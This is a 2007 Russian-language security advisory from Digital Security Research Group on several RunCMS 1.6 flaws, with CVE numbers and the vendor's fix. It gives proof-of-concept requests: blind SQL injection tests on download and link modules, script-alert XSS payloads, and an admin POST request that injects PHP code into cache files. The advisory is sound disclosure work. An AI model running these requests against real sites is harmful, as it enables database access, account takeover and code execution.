ru | en
Уязвимости Эксплойты Публикации Новости О DSecRG


[DSECRG-07-001] RunCMS 1.6 - Множественные уязвимости (LFI,SQL,XSS)

В приложении RunCMS обнаружено множество уязвимостей:

1. Слепые SQL инъекции
2. Хранимый межсайтовый скриптинг
3. Межсайтовый скриптинг
4. Межсайтовый скриптинг в изображении
5. Предсказуемый идентификатор сессии
6. Небезопасная смена пароля (XSRF)
7. Инъекция PHP-кода в административной панели



Application: RunCMS
Versions Affected: RunCMS 1.6
Vendor URL: http://www.runcms.org
Bugs: Множественные уязвимости:SQL инъекции, межсайтовый скриптинг,инклюдинг локальных файлов, предсказуемый идентификатор сессии.
Exploits: YES
Reported: 14.12.2007
Vendor response: 15.12.2007
Date of Public Advisory: 25.12.2007
CVE-number: 2007-6544, 2007-6545, 2007-6546, 2007-6547, 2007-6548
Authors: Alexandr Polyakov, Stas Svistunovich
Digital Security Reasearch Group (research@dsec.ru)


Детали
******

1. Слепые SQL инъекции

Злоумышленник может выполнить произвольный SQL код в базе данных приложения

уязвимые сценарии:

http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION


Example:

Этот запрос вернёт ссылку на загружаемый файл:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0


Этот запрос вернёт ошибку:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0

--------------------------------------------------------------------------------------------


2.Хранимый межсайтовый скриптинг

Уязвимость обнаружена в сценарии modules/news/submit.php уязвимый POST параметр - "subject"


Example:

POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0


subject=<script>alert("DSecRG XSS")</script>

--------------------------------------------------------------------------------------------


3.Межсайтовый скриптинг

Уязвимость обнаружена в сценарии modules/news/index.php злоумышленник может внедрить XSS в строку URL


Example:

http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG XSS')</script>

--------------------------------------------------------------------------------------------


4. Злоумышленник может загрузить изображение содержащее XSS при помощи сценария edituser.php.


Подробная информация: http://www.dsec.ru/about/articles/web_xss/ (in Russian)

--------------------------------------------------------------------------------------------


5. Предсказуемый идентификатор сессии

Генератор значения Session id использует функцию зависящую от времени, тем самым значение параметра давольно просто предсказать, что позволяет получив единожды cookie пользователя подключаться под его аккаунтом даже когда время сессии истекло.

--------------------------------------------------------------------------------------------

6.Небезопасный алгоритм смены пароля

В странице смены пароля не требуется ввода старого пароля, тем самым злоумышленник может при помощи XSS уязвимости сменить пароль администратору.


--------------------------------------------------------------------------------------------


7. Инъекция PHP-кода в административной панели

Администратор может внедрить произвольный PHP код и выполнять любые команды в операциолнной системе от имени пользователя, с привилегиями которого запущен WEB-сервер


Уязвимый сценарий: /modules/system/admin.php?fct=meta-generator
Уязвимые параметры: "header","footer"


Уязвимый сценарий: /modules/system/admin.php?fct=disclaimer
Уязвимый параметр: "disclaimer"

Уязвимый сценарий: /modules/mydownloads/admin/index.php?op=mydownloadsConfigAdmin
Уязвимый параметр: "disclaimer"

Уязвимый сценарий: /modules/newbb_plus/admin/forum_config.php
Уязвимый параметр: "disclaimer"

Уязвимый сценарий: /modules/mylinks/admin/index.php?op=myLinksConfigAdmin
Уязвимый параметр: "disclaimer"

Уязвимый сценарий: /modules/sections/admin/index.php?op=secconfig
Уязвимый параметр: "intro"


Пример:

POST /modules/system/admin.php?fct=disclaimer HTTP/1.0
Host=localhost
User-Agent=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
Keep-Alive=300
Proxy-Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=226
POSTDATA=perpage=10&popular=100&newlinks=10&useshots=0&shotwidth=140&anon_add=0& rss_enable=1&rss_maxitems=5&rss_maxdescription=200&disclaimer=<?phpinfo();?>& op=myLinksConfigChange




В результате инъекции PHP =кода следующие сценарии будут переписаны:

runcms_1.6\modules\sections\cache\intro.php
runcms_1.6\modules\mylinks\cache\disclaimer.php
runcms_1.6\modules\mydownloads\cache\disclaimer.php
runcms_1.6\modules\newbb_plus\cache\disclaimer.php
runcms_1.6\modules\system\cache\disclaimer.php
runcms_1.6\modules\system\cache\footer.php
runcms_1.6\modules\system\cache\header.php
runcms_1.6\modules\system\cache\maintenance.php



Решение
*******

Производитель исправил уязвимости 15 декабря 2007 г.
Обновлённую версию 1.6.1 можно скачать по ссылке:

http://www.runcms.org/modules/mydownloads/visit.php?lid=131


О компании
**********

Digital Security - одна из ведущих российских консалтинговых компаний в области информационной безопасности, а также в области оценки соответствия информационных систем требованиям ISO/IEC 27001 и PCI DSS, лидер на рынке специализированных систем разработки и внедрения системы управления информационной безопасностью в соответствии с ISO/IEC 27001.
Digital Security Research Group (DSecRG) - исследовательский центр компании Digital Security,занимающийся поиском и исследованием уязвимостей различных приложений и систем, результаты которых регулярно представляются на сайте в виде отчетов об уязвимостях (advisory), а так же отчетах об исследованиях (whitepappers).

Контакты: research [at] dsec [dot] ru
http://www.dsecrg.ru
http://www.dsec.ru

Уязвимости RSS RSS
03.09.2013
[DSECRG-13-016] SAP NetWeaver ABAD0_DELETE_DERIVATION_TABLE — SQL-инъекция

24.07.2013
[DSECRG-13-015] SAP DevInfPage - Обход безопасности

24.07.2013
[DSECRG-13-014] SAP DI Log Viewer - Обход безопасности

21.05.2013
[DSECRG-13-013] SAProuter — Переполнение буфера в куче

25.04.2013
[DSECRG-13-012] SAP NetWeaver PFL — SMB Relay

25.04.2013
[DSECRG-13-011] SAP NetWeaver PFL — SMB Relay

Список уязвимостей


© 2002—2016, Digital Security
При использовании материалов сайта
ссылка на источник обязательна

+7 (812) 703-1547, +7 (812) 430-9130    e-mail: research@dsec.ru

Поиск